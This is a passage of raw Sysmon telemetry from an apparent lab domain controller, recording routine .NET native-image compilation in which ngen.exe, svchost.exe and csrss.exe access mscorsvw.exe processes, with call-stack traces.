13:21:53.758{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-FC01-000000009A01}860C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.742{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-FB01-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.727{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4571-6000-FB01-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.727{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-FB01-000000009A01}4256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.680{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-FA01-000000009A01}4160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.680{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4571-6000-FA01-000000009A01}4160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.680{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-FA01-000000009A01}4160C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.633{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F901-000000009A01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.617{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F901-000000009A01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.617{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F901-000000009A01}4960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.586{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F801-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.570{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F801-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006102Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.570{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F801-000000009A01}4868C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006101Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.524{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F701-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006100Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.508{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F701-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006099Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.508{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F701-000000009A01}4716C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006098Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.461{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F601-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006097Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.445{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F601-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006096Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.445{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F601-000000009A01}4916C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006095Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.383{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4571-6000-F501-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006094Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.367{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4571-6000-F501-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:53.367{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4571-6000-F501-000000009A01}2516C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:21:53.320{08A6967A-4571-6000-F401-000000009A01}2884C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\b44-0\Microsoft.VisualC.dll2021-01-14 13:21:53.320 10341000x80000000000000006091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 